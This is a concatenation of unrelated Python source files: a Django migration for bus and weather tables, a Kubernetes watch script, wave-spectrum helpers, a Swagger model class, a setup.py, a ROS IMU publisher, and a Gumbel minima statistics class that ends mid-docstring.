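# MAGIC The string-formatted SQL above is convenient interactively; the equivalent DataFrame filter below avoids manual quoting.

# COMMAND ----------

display(variants_df.where((fx.col("contigName") == chrom) &
                          (fx.col("start") >= gene_start) &
                          (fx.col("end") <= gene_end) &
                          (fx.col("sampleId") == sampleId)))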
|
# Generated by Django 2.0.6 on 2018-07-17 14:09
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AuthGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80, unique=True)),
],
options={
'db_table': 'auth_group',
'managed': False,
},
),
migrations.CreateModel(
name='AuthPermission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('codename', models.CharField(max_length=100)),
],
options={
'db_table': 'auth_permission',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128)),
('last_login', models.DateTimeField(blank=True, null=True)),
('is_superuser', models.IntegerField()),
('username', models.CharField(max_length=150, unique=True)),
('first_name', models.CharField(max_length=30)),
('last_name', models.CharField(max_length=150)),
('email', models.CharField(max_length=254)),
('is_staff', models.IntegerField()),
('is_active', models.IntegerField()),
('date_joined', models.DateTimeField()),
],
options={
'db_table': 'auth_user',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUserGroups',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'auth_user_groups',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUserUserPermissions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'auth_user_user_permissions',
'managed': False,
},
),
migrations.CreateModel(
name='DarkskyCurrentWeather',
fields=[
('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
('description', models.CharField(blank=True, max_length=40, null=True)),
('temp', models.FloatField(blank=True, null=True)),
('icon', models.CharField(blank=True, max_length=40, null=True)),
('precip_intensity', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'DarkSky_current_weather',
'managed': False,
},
),
migrations.CreateModel(
name='DarkskyHistoricalWeatherData',
fields=[
('time', models.IntegerField(primary_key=True, serialize=False)),
('day_of_week', models.CharField(blank=True, max_length=20, null=True)),
('description', models.CharField(blank=True, max_length=50, null=True)),
('temp', models.FloatField(blank=True, null=True)),
('precip_intensity', models.FloatField(blank=True, null=True)),
('hour', models.IntegerField(blank=True, null=True)),
('month', models.IntegerField(blank=True, null=True)),
('date', models.DateTimeField(blank=True, null=True)),
('year', models.IntegerField(blank=True, null=True)),
('icon', models.CharField(blank=True, max_length=30, null=True)),
],
options={
'db_table': 'DarkSky_historical_weather_data',
'managed': False,
},
),
migrations.CreateModel(
name='DarkskyHourlyWeatherPrediction',
fields=[
('timestamp', models.DateTimeField()),
('time', models.IntegerField(primary_key=True, serialize=False)),
('day_of_week', models.CharField(blank=True, max_length=10, null=True)),
('description', models.CharField(blank=True, max_length=40, null=True)),
('temp', models.FloatField(blank=True, null=True)),
('icon', models.CharField(blank=True, max_length=40, null=True)),
('precip_intensity', models.FloatField(blank=True, null=True)),
('hour', models.IntegerField(blank=True, null=True)),
('month', models.IntegerField(blank=True, null=True)),
('date', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'DarkSky_hourly_weather_prediction',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoAdminLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('action_time', models.DateTimeField()),
('object_id', models.TextField(blank=True, null=True)),
('object_repr', models.CharField(max_length=200)),
('action_flag', models.PositiveSmallIntegerField()),
('change_message', models.TextField()),
],
options={
'db_table': 'django_admin_log',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoContentType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app_label', models.CharField(max_length=100)),
('model', models.CharField(max_length=100)),
],
options={
'db_table': 'django_content_type',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoMigrations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app', models.CharField(max_length=255)),
('name', models.CharField(max_length=255)),
('applied', models.DateTimeField()),
],
options={
'db_table': 'django_migrations',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoSession',
fields=[
('session_key', models.CharField(max_length=40, primary_key=True, serialize=False)),
('session_data', models.TextField()),
('expire_date', models.DateTimeField()),
],
options={
'db_table': 'django_session',
'managed': False,
},
),
migrations.CreateModel(
name='FareStages',
fields=[
('stoppointid', models.IntegerField(primary_key=True, serialize=False)),
('stage', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'fare_stages',
'managed': False,
},
),
migrations.CreateModel(
name='StaticBusData',
fields=[
('long', models.FloatField()),
('lat', models.FloatField()),
('longname', models.CharField(max_length=30)),
('shortname', models.CharField(max_length=30)),
('stoppointid', models.IntegerField(primary_key=True, serialize=False)),
('streetname', models.CharField(max_length=30)),
],
options={
'db_table': 'static_bus_data',
'managed': False,
},
),
migrations.CreateModel(
name='Trips2017',
fields=[
('dayofservice', models.CharField(blank=True, max_length=30, null=True)),
('tripid', models.IntegerField()),
('lineid', models.CharField(blank=True, max_length=10, null=True)),
('routeid', models.CharField(blank=True, max_length=10, null=True)),
('direction', models.IntegerField(blank=True, null=True)),
('plannedtime_arr', models.IntegerField(blank=True, null=True)),
('plannedtime_dep', models.IntegerField(blank=True, null=True)),
('actualtime_arr', models.IntegerField(blank=True, null=True)),
('actualtime_dep', models.IntegerField(blank=True, null=True)),
('suppressed', models.IntegerField(blank=True, null=True)),
('timestamp', models.IntegerField(primary_key=True, serialize=False)),
],
options={
'db_table': 'trips_2017',
'managed': False,
},
),
migrations.CreateModel(
name='Leavetimes2017',
fields=[
('dayofservice', models.CharField(blank=True, max_length=30, null=True)),
('progrnumber', models.IntegerField()),
('stoppointid', models.IntegerField(blank=True, null=True)),
('plannedtime_arr', models.IntegerField(blank=True, null=True)),
('plannedtime_dep', models.IntegerField(blank=True, null=True)),
('actualtime_arr', models.IntegerField(blank=True, null=True)),
('actualtime_dep', models.IntegerField(blank=True, null=True)),
('vehicleid', models.IntegerField(blank=True, null=True)),
('suppressed', models.IntegerField(blank=True, null=True)),
('lastupdate', models.CharField(blank=True, max_length=30, null=True)),
('timestamp', models.ForeignKey(db_column='timestamp', on_delete=django.db.models.deletion.DO_NOTHING, primary_key=True, related_name='timestamp_fk', serialize=False, to='api.Trips2017')),
],
options={
'db_table': 'leavetimes_2017',
'managed': False,
},
),
]
|
# Copyright 2020 Fortinet(c)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Uses watch to print the stream of events from list namespaces and list pods.
The script will wait for 10 events related to namespaces to occur within
the `timeout_seconds` threshold and then move on to wait for another 10 events
related to pods to occur within the `timeout_seconds` threshold..metadata.resource_version
"""
from kubernetes import client, config, watch
import json
import os
from pprint import pprint
def main():
# Configs can be set in Configuration class directly or using helper
# utility. If no argument provided, the config will be loaded from
# default location.
config.load_kube_config()
print("PID : %s" % (os.getpid()))
v1 = client.CoreV1Api()
count = 500
w = watch.Watch()
endpoints = v1.list_endpoints_for_all_namespaces(watch=False)
endp_resversion = endpoints.metadata.resource_version
print (endp_resversion)
for event in w.stream(v1.list_endpoints_for_all_namespaces, field_selector="metadata.namespace!=kube-system", resource_version=endp_resversion, timeout_seconds=10, pretty='true'):
pprint(event)
print("Event: %s %s %s" % (
event['type'], event['object'].metadata.name, event['object'].metadata.annotations))
count -= 1
if not count:
w.stop()
print("Finished endpoints stream.")
##
for event in w.stream(v1.list_service_for_all_namespaces, label_selector="app", timeout_seconds=100):
pprint(event)
print("Event: %s %s %s" % (
event['type'],
event['object'].kind,
json.loads(event['object'].metadata.annotations['kubectl.kubernetes.io/last-applied-configuration'])['metadata'])
)
count -= 1
if not count:
w.stop()
print("Finished pod stream.")
if __name__ == '__main__':
main()
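# Added sketch (not from the original example): to watch a single namespace instead of all
# namespaces, the namespaced list call can be streamed the same way, e.g.:
#   for event in w.stream(v1.list_namespaced_endpoints, namespace="default", timeout_seconds=10):
#       print(event['type'], event['object'].metadata.name)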
|
"""
Created June 2021
Author: Marco Behrendt
Leibniz Universität Hannover, Germany
University of Liverpool, United Kingdom
https://github.com/marcobehrendt/Projecting-interval-uncertainty-through-the-discrete-Fourier-transform
"""
import numpy
from numpy import (arange, cos, exp, linspace, mean, pi, sin, zeros) # for convenience
from matplotlib import pyplot, cm
# The code in this file should comply to PEP-8: https://realpython.com/python-pep8/
def subplots(figsize=(16,8),size=None): # wrapper of the matplotlib.pyplot figure gen
if size is None:
fig, ax = pyplot.subplots(figsize=figsize)
else:
fig, ax = pyplot.subplots(figsize=figsize,size=size)
return fig,ax
def plot_signal(signal,figsize=(18,6),xlabel=r'#$x$',ylabel=r'$x$',color=None,lw=1,title=None,ax=None,label=None):
x = list(range(len(signal)))
y = signal
if ax is None:
fig = pyplot.figure(figsize=figsize)
ax = fig.subplots()
ax.grid()
ax.plot(x,y,marker='.',color=color,lw=lw,label=label) # https://matplotlib.org/3.1.0/gallery/color/named_colors.html
ax.set_xlabel(xlabel,fontsize=20)
ax.set_ylabel(ylabel,fontsize=20)
ax.tick_params(direction='out', length=6, width=2, labelsize=14)
if title is not None:
ax.set_title(title,fontsize=20)
return None
def jonswap_spectrum(w,alpha,w_p,gamma,sigma1,sigma2):
g = 9.81
N = len(w)
spectrum = numpy.zeros(N)
r = numpy.zeros(N)
for x in range(len(w)):
if w[x] == 0:
spectrum[x] = 0
else:
if w[x] <= w_p:
r[x] = exp(-(w[x]-w_p)**2/(2*sigma1**2*w_p**2))
else:
r[x] = exp(-(w[x]-w_p)**2/(2*sigma2**2*w_p**2))
spectrum[x] = alpha * g**2 / w[x]**5 * exp( -5/4 * (w_p/w[x])**4 ) * gamma**r[x]
return spectrum
def stochastic_process(spectrum, w, t):
Nt = len(t)
Nw = len(w)
dw = w[1] - w[0]
signal = numpy.zeros(Nt)
for w_n in range(Nw):
if w[w_n] == 0:
A = 0
else:
A = (2*spectrum[w_n]*dw)**0.5
phi = 2*pi*numpy.random.random_sample()
signal += 2**0.5 * A * cos(w[w_n] * t + phi)
return signal
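# Example usage (a sketch; the JONSWAP parameters below are illustrative, not the values
# used in the accompanying study):
#   w = linspace(0, 4, 400)       # angular frequency grid [rad/s]
#   t = linspace(0, 600, 2048)    # time grid [s]
#   S = jonswap_spectrum(w, alpha=0.0081, w_p=0.7, gamma=3.3, sigma1=0.07, sigma2=0.09)
#   x = stochastic_process(S, w, t)
#   plot_signal(x, xlabel=r'$t$ [s]', ylabel=r'$x(t)$')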
def wind_turbine(R,r,h_pile,rho_steel,c,k):
A_steel = (R**2 - r**2)*pi
V_steel = A_steel * h_pile
m_steel = rho_steel * V_steel
w0 = (k/m_steel)**0.5
xi = c/(w0*2*m_steel)
return w0,xi
def frequency_response_interval(w,spectrum,w0,xi):
ai_low=[ai.lo() for ai in spectrum]
ai_high=[ai.hi() for ai in spectrum]
H_low = ai_low * abs(1/(w0**2 - w**2 + 2 * xi * w0*w*1j))**2
H_high = ai_high * abs(1/(w0**2 - w**2 + 2 * xi * w0*w*1j))**2
return H_low,H_high
def frequency_response(w,spectrum,w0,xi):
H = spectrum * abs(1/(w0**2 - w**2 + 2 * xi * w0*w*1j))**2
return H
def periodogram(spectrum,t, dt):
for x in range(len(spectrum)):
spectrum[x] = spectrum[x]**2*dt**2/t[len(t)-1]/(2*pi)
return spectrum
def plot_line(x,y,figsize=(18,6),xlabel=r'#$x$',ylabel='$x$',color=None,lw=1,title=None,ax=None,label=None):
if ax is None:
fig = pyplot.figure(figsize=figsize)
ax = fig.subplots()
ax.grid()
ax.plot(x,y,marker='.',color=color,lw=lw,label=label) # https://matplotlib.org/3.1.0/gallery/color/named_colors.html
ax.set_xlabel(xlabel,fontsize=20)
ax.set_ylabel(ylabel,fontsize=20)
ax.tick_params(direction='out', length=6, width=2, labelsize=14)
if title is not None:
ax.set_title(title,fontsize=20)
return ax
def plot_bounds(x,bounds,color=None,alpha=None,ax=None):
if ax is None:
fig = pyplot.figure(figsize=(18,6))
ax = fig.subplots()
ax.grid()
bounds_low=[ai.lo() for ai in bounds]
bounds_high=[ai.hi() for ai in bounds]
ax.fill_between(x,bounds_low,bounds_high,alpha=alpha,label='Interval',edgecolor='blue',lw=2,color=color)
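if __name__ == '__main__':
    # Illustrative usage sketch, not part of the original script; all parameter values below
    # are assumptions (typical textbook JONSWAP settings) chosen only for demonstration.
    w = linspace(0, 6, 512)        # angular frequency grid [rad/s]
    t = linspace(0, 600, 4096)     # time grid [s]
    spectrum = jonswap_spectrum(w, alpha=0.0081, w_p=1.0, gamma=3.3, sigma1=0.07, sigma2=0.09)
    signal = stochastic_process(spectrum, w, t)
    plot_line(w, spectrum, xlabel=r'$\omega$ [rad/s]', ylabel=r'$S(\omega)$', title='JONSWAP spectrum')
    plot_signal(signal, xlabel='sample index', ylabel=r'$x(t)$', title='One realisation of the process')
    pyplot.show()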
|
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class FeedResource(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'feed_type': 'str',
'package_acquisition_location_options': 'list[str]',
'space_id': 'str',
'last_modified_on': 'datetime',
'last_modified_by': 'str',
'links': 'dict(str, str)'
}
attribute_map = {
'id': 'Id',
'name': 'Name',
'feed_type': 'FeedType',
'package_acquisition_location_options': 'PackageAcquisitionLocationOptions',
'space_id': 'SpaceId',
'last_modified_on': 'LastModifiedOn',
'last_modified_by': 'LastModifiedBy',
'links': 'Links'
}
def __init__(self, id=None, name=None, feed_type=None, package_acquisition_location_options=None, space_id=None, last_modified_on=None, last_modified_by=None, links=None): # noqa: E501
"""FeedResource - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._feed_type = None
self._package_acquisition_location_options = None
self._space_id = None
self._last_modified_on = None
self._last_modified_by = None
self._links = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
if feed_type is not None:
self.feed_type = feed_type
if package_acquisition_location_options is not None:
self.package_acquisition_location_options = package_acquisition_location_options
if space_id is not None:
self.space_id = space_id
if last_modified_on is not None:
self.last_modified_on = last_modified_on
if last_modified_by is not None:
self.last_modified_by = last_modified_by
if links is not None:
self.links = links
@property
def id(self):
"""Gets the id of this FeedResource. # noqa: E501
:return: The id of this FeedResource. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this FeedResource.
:param id: The id of this FeedResource. # noqa: E501
:type: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this FeedResource. # noqa: E501
:return: The name of this FeedResource. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this FeedResource.
:param name: The name of this FeedResource. # noqa: E501
:type: str
"""
self._name = name
@property
def feed_type(self):
"""Gets the feed_type of this FeedResource. # noqa: E501
:return: The feed_type of this FeedResource. # noqa: E501
:rtype: str
"""
return self._feed_type
@feed_type.setter
def feed_type(self, feed_type):
"""Sets the feed_type of this FeedResource.
:param feed_type: The feed_type of this FeedResource. # noqa: E501
:type: str
"""
allowed_values = ["None", "NuGet", "Docker", "Maven", "OctopusProject", "GitHub", "Helm", "AwsElasticContainerRegistry", "BuiltIn"] # noqa: E501
if feed_type not in allowed_values:
raise ValueError(
"Invalid value for `feed_type` ({0}), must be one of {1}" # noqa: E501
.format(feed_type, allowed_values)
)
self._feed_type = feed_type
@property
def package_acquisition_location_options(self):
"""Gets the package_acquisition_location_options of this FeedResource. # noqa: E501
:return: The package_acquisition_location_options of this FeedResource. # noqa: E501
:rtype: list[str]
"""
return self._package_acquisition_location_options
@package_acquisition_location_options.setter
def package_acquisition_location_options(self, package_acquisition_location_options):
"""Sets the package_acquisition_location_options of this FeedResource.
:param package_acquisition_location_options: The package_acquisition_location_options of this FeedResource. # noqa: E501
:type: list[str]
"""
allowed_values = ["Server", "ExecutionTarget", "NotAcquired"] # noqa: E501
if not set(package_acquisition_location_options).issubset(set(allowed_values)):
raise ValueError(
"Invalid values for `package_acquisition_location_options` [{0}], must be a subset of [{1}]" # noqa: E501
.format(", ".join(map(str, set(package_acquisition_location_options) - set(allowed_values))), # noqa: E501
", ".join(map(str, allowed_values)))
)
self._package_acquisition_location_options = package_acquisition_location_options
@property
def space_id(self):
"""Gets the space_id of this FeedResource. # noqa: E501
:return: The space_id of this FeedResource. # noqa: E501
:rtype: str
"""
return self._space_id
@space_id.setter
def space_id(self, space_id):
"""Sets the space_id of this FeedResource.
:param space_id: The space_id of this FeedResource. # noqa: E501
:type: str
"""
self._space_id = space_id
@property
def last_modified_on(self):
"""Gets the last_modified_on of this FeedResource. # noqa: E501
:return: The last_modified_on of this FeedResource. # noqa: E501
:rtype: datetime
"""
return self._last_modified_on
@last_modified_on.setter
def last_modified_on(self, last_modified_on):
"""Sets the last_modified_on of this FeedResource.
:param last_modified_on: The last_modified_on of this FeedResource. # noqa: E501
:type: datetime
"""
self._last_modified_on = last_modified_on
@property
def last_modified_by(self):
"""Gets the last_modified_by of this FeedResource. # noqa: E501
:return: The last_modified_by of this FeedResource. # noqa: E501
:rtype: str
"""
return self._last_modified_by
@last_modified_by.setter
def last_modified_by(self, last_modified_by):
"""Sets the last_modified_by of this FeedResource.
:param last_modified_by: The last_modified_by of this FeedResource. # noqa: E501
:type: str
"""
self._last_modified_by = last_modified_by
@property
def links(self):
"""Gets the links of this FeedResource. # noqa: E501
:return: The links of this FeedResource. # noqa: E501
:rtype: dict(str, str)
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this FeedResource.
:param links: The links of this FeedResource. # noqa: E501
:type: dict(str, str)
"""
self._links = links
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(FeedResource, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, FeedResource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
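# Illustrative usage sketch (not part of the generated client; the id and name values are
# made-up examples): construct a FeedResource and round-trip it through the helpers above.
if __name__ == '__main__':
    feed = FeedResource(
        id='Feeds-1',                 # hypothetical feed id
        name='internal-nuget',        # hypothetical feed name
        feed_type='NuGet',            # must be one of the allowed_values enforced by the setter
        package_acquisition_location_options=['Server', 'ExecutionTarget'])
    print(feed.to_str())              # pretty-printed dict representation via to_dict()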
|
from setuptools import setup
import setuptools
setup(
    name='tidytextpy',  # package name
    version='0.0.1',  # package version
    description='A Python port of the R tidytext package; provides simple access to functions such as unnest_tokens, get_sentiments, get_stopwords and bind_tf_idf.',  # short description
    author='大邓',  # author
    author_email='thunderhit@qq.com',  # author email
    url='https://github.com/thunderhit/tidytextpy',  # project homepage
    packages=setuptools.find_packages(),
    package_data={'': ['dictionary/*.txt', 'dictionary/*.csv']},  # csv/txt dictionary files bundled with the package
    python_requires='>=3.5',
    license="MIT",
    keywords=['tidytext', 'text analysis', 'sentiment', 'sentiment analysis', 'natural language processing', 'R', 'python'],
    long_description=open('README.md').read(),  # long description read from the README
    long_description_content_type="text/markdown")  # the README is in Markdown format
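# Typical build/install commands (assumed, not part of the original file):
#   python setup.py sdist bdist_wheel   # build source and wheel distributions
#   pip install tidytextpy              # install from PyPI, if published, or install the built wheel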
|
#!/usr/bin/env python3
import board
import busio
import rospy
import adafruit_lsm6ds
from sensor_msgs.msg import Imu
def main():
rospy.init_node('accelerometer', anonymous=False)
pub = rospy.Publisher("imu", Imu, queue_size=10)
    rospy.loginfo('LSM6DSOX IMU accelerometer publishing to the imu topic')
i2c = busio.I2C(board.SCL, board.SDA)
sensor = adafruit_lsm6ds.LSM6DSOX(i2c)
imu_msg = Imu()
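    # Per the sensor_msgs/Imu convention, an all-zero covariance matrix means "covariance
    # unknown"; a real deployment would fill these in from the sensor datasheet.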
imu_msg.linear_acceleration_covariance = [
0, 0, 0,
0, 0, 0,
0, 0, 0
]
imu_msg.angular_velocity_covariance = [
0, 0, 0,
0, 0, 0,
0, 0, 0
]
while not rospy.is_shutdown():
x, y, z = sensor.acceleration
imu_msg.linear_acceleration.x = x
imu_msg.linear_acceleration.y = y
imu_msg.linear_acceleration.z = z
pub.publish(imu_msg)
rospy.sleep(1)
    rospy.logwarn('LSM6DSOX IMU accelerometer offline')
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:class:`GumbelMin` class and functions related to Gumbel (minima) distribution.
"""
import numpy as np
from scipy.special import zetac
from scipy.optimize import leastsq, fsolve
from matplotlib.pyplot import figure, ylabel, yticks, plot, legend, grid, show, xlabel, ylim, savefig
from .empirical import empirical_cdf
from .gumbel import _euler_masceroni as em
# todo: move fit methods e.g. _msm from class to standalone functions (importable)
# todo: check fit procedures (read up once more and check implementation)
# todo: create unit tests
class GumbelMin(object):
"""
The Gumbel minima distribution.
The cumulative distribution function is defined as::
F(x) = 1 - exp{-exp[(x-a)/b]}
where `a` is location parameter and `b` is the scale parameter.
Parameters
----------
loc : float
Gumbel location parameter.
scale : float
Gumbel scale parameter.
data : array_like, optional
Sample data, used to establish empirical cdf and is included in plots.
To fit the Gumbel distribution to the sample data, use :meth:`GumbelMin.fit`.
Attributes
----------
loc : float
Gumbel location parameter.
scale : float
Gumbel scale parameter.
data : array_like
Sample data.
Examples
--------
To initiate an instance based on parameters, use:
>>> from qats.stats.gumbelmin import GumbelMin
>>> gumb = GumbelMin(loc, scale)
    If you need to establish a GumbelMin instance based on a sample data set, use:
    >>> gumb = GumbelMin(data=data)
    >>> gumb.fit(method='msm')
References
----------
1. Bury, K.V. (1975) Statistical models in applied science. Wiley, New York
2. Haver, S. (2007), "Bruk av asymptotiske ekstremverdifordelinger"
3. `Plotting positions <http://en.wikipedia.org/wiki/Q%E2%80%93Q_plot>`_, About plotting positions
4. `Usable estimators for parameters in Gumbel distribution
<http://stats.stackexchange.com/questions/71197/usable-estimators-for-parameters-in-gumbel-distribution>`_
5. `Bootstrapping statistics <https://en.wikipedia.org/wiki/Bootstrapping_(statistics)>`_
"""
def __init__(self, loc=None, scale=None, data=None):
self.location = loc
self.scale = scale
if data is not None:
self.data = np.array(data)
else:
self.data = None
@property
def cov(self):
"""
Distribution coefficient of variation (C.O.V.)
Returns
-------
c : float
distribution c.o.v.
"""
return self.std / self.mean
@property
def ecdf(self):
"""
Median rank empirical cumulative distribution function associated with the sample
Notes
-----
Gumbel recommended the following mean rank quantile formulation Pi = i/(n+1).
This formulation produces a symmetrical CDF in the sense that the
same plotting positions will result from the data regardless of
whether they are assembled in ascending or descending order.
        A more sophisticated median rank formulation Pi = (i-0.3)/(n+0.4) approximates the
        median of the distribution-free estimate of the sample variate to about
        0.1% and, even for small values of n, produces parameter estimates
        comparable to those obtained by maximum likelihood estimation (Bury, 1999, p. 43).
        This median rank formulation is therefore used here [2].
The empirical cdf is also used as plotting positions when plotting the sample
on probability paper.
"""
x = np.array(self.data)
try:
#p = (np.arange(x.size) + 1. - 0.3) / (x.size + 0.4)
p = empirical_cdf(self.data.size, kind='median')
return p
except TypeError:
print("The sample is not defined.")
@property
def kurt(self):
"""
Distribution kurtosis
Returns
-------
k : float
distribution kurtosis
"""
try:
k = 12. / 5.
return k
except TypeError:
print("Distribution parameters are not defined.")
@property
def mean(self):
"""
Distribution mean value
Returns
-------
m : float
distribution mean value
"""
try:
m = self.location - self.scale * em()
return m
except TypeError:
print("Distribution parameters are not defined.")
@property
def median(self):
"""
Distribution median value
Returns
-------
m : float
distribution median value
"""
try:
m = self.location + self.scale * np.log(np.log(2.))
return m
except TypeError:
print("Distribution parameters are not defined.")
@property
def mode(self):
"""
Distribution mode value
Returns
-------
m : float
distribution mode value
"""
try:
m = self.location
return m
except TypeError:
print("Distribution parameters are not defined.")
@property
def std(self):
"""
Distribution standard deviation
Returns
-------
s : float
distribution standard deviation
"""
try:
s = np.pi * self.scale / np.sqrt(6)
return s
except TypeError:
print("Distribution parameters are not defined.")
@property
def skew(self):
"""
Distribution skewness
Returns
-------
s : float
distribution skewness
"""
try:
# zetac is the complementary Riemann zeta function (zeta function minus 1)
# http://docs.scipy.org/doc/scipy/reference/generated/scipy.special.zetac.html
s = -12. * np.sqrt(6.) * (1. + zetac(3)) / np.pi ** 3
return s
except TypeError:
print("Distribution parameters are not defined.")
def bootstrap(self, size=None, method='msm', N=100):
"""
Parametric bootstrapping of source distribution
Parameters
----------
size : int
bootstrap sample size. default equal to source sample size
method : {'msm','lse','mle'}
method of fit, optional
'msm' = method of sample moments
'lse' = least-square estimation
'mle' = maximum likelihood estimation
        N : int
            number of bootstrap samples, default 100
        Returns
        -------
        array_like
            m - mean of the fitted distribution parameters
        array_like
            cv - coefficient of variation of the fitted distribution parameters
Notes
-----
In statistics, bootstrapping is a method for assigning measures of accuracy
to sample estimates (variance,quantiles). This technique allows estimation of the
sampling distribution of almost any statistic using only very simple methods. Generally,
it falls in the broader class of resampling methods. In this case a parametric model is fitted
to the data, and samples of random numbers with the same size as the original data,
are drawn from this fitted model. Then the quantity, or estimate, of interest is
calculated from these data. This sampling process is repeated many times as for other
bootstrap methods. If the results really matter, as many samples as is reasonable,
given available computing power and time, should be used. Increasing the number of
samples cannot increase the amount of information in the original data, it can only
reduce the effects of random sampling errors which can arise from a bootstrap procedure itself.
See [5] about bootstrapping.
"""
        options = {'msm': msm, 'lse': lse, 'mle': mle}
assert method.lower() in options.keys(), "Method must be either %s" % (' or '.join(options.keys()))
if size is None:
assert self.data is not None, "Either size has to be specified or a sample has to be specified."
size = np.size(self.data)
i = 0
par = np.zeros((N, 2))
while (i < N):
x = self.rnd(size=size)
par[i, :] = options[method](x)
i += 1
m = par.mean(axis=0)
cv = par.std(axis=0, ddof=1) / m
return m, cv
def cdf(self, x=None):
"""
Cumulative distribution function (cumulative probability) for specified values x
Parameters
----------
x : array_like
values
Returns
-------
cdf : array
cumulative probabilities for specified values x
Notes
-----
        A range of x values [location - 3*std, location] is applied if x is not specified.
"""
try:
if x is None:
            x = np.linspace(self.location, self.location - 3. * self.std, 100)
else:
x = np.array(x)
assert self.scale > 0., "The scale parameter must be larger than 0."
z = (x - self.location) / self.scale
p = 1. - np.exp(-np.exp(z))
return p
except TypeError:
print("Distribution parameters are not defined")
def fit(self, data=None, method='msm', verbose=False):
"""
Determine distribution parameters by fit to sample.
Parameters
----------
data : array_like
sample, optional
method : {'msm','lse','mle'}
method of fit, optional
'msm' = method of sample moments
'lse' = least-square estimation
'mle' = maximum likelihood estimation
verbose : bool
turn on output of fitted parameters
Notes
-----
If data is not input any data stored in object (self.data) will be used.
"""
options = {'msm': msm, 'lse': lse, 'mle': mle}
assert method.lower() in options.keys(), "Method must be either %s" % (' or '.join(options.keys()))
if data is not None:
# update sample data
self.data = np.array(data).reshape(np.shape(data)) # make vector shaped
try:
self.location, self.scale = options[method](self.data)
if verbose:
print("Fitted parameters:\nlocation = %(location)5.3g\nscale = %(scale)5.3g" % self.__dict__)
except TypeError:
print("The sample data is not defined.")
def fit_from_weibull_parameters(self, wa, wb, wc, n, verbose=False):
"""
Calculate Gumbel distribution parameters from n independent Weibull distributed variables.
Parameters
----------
wa : float
Weibull location parameter
wb : float
Weibull scale parameter
wc : float
Weibull shape parameter
n : int
Number independently distributed variables
verbose : bool
print fitted parameters
Notes
-----
        A warning is issued if the Weibull shape parameter is less than 1. In this case,
        the convergence towards the asymptotic extreme value distribution is slow,
        and the asymptotic distribution will be non-conservative relative
        to the exact distribution. The asymptotic distribution is correct with a Weibull
        shape equal to 1 and conservative with a Weibull shape larger than 1.
        These deviations diminish with larger samples. See [1, p. 380].
"""
raise NotImplementedError("Formula for deriving Gumbel minimum distribution parameter is not implemented.")
pass
# self.location = wa + wb * np.log(n) ** (1. / wc)
# self.scale = 1. / (wc / wb * np.log(n) ** ((wc - 1.) / wc))
# if verbose:
# print "Fitted parameters:\nlocation = %(location)5.3g\nscale = %(scale)5.3g" % self.__dict__
def gp_plot(self, showfig=True, save=None):
"""
        Plot data on Gumbel paper (linearized scales)
Parameters
----------
showfig : bool
show figure immediately on screen, default True
save : filename
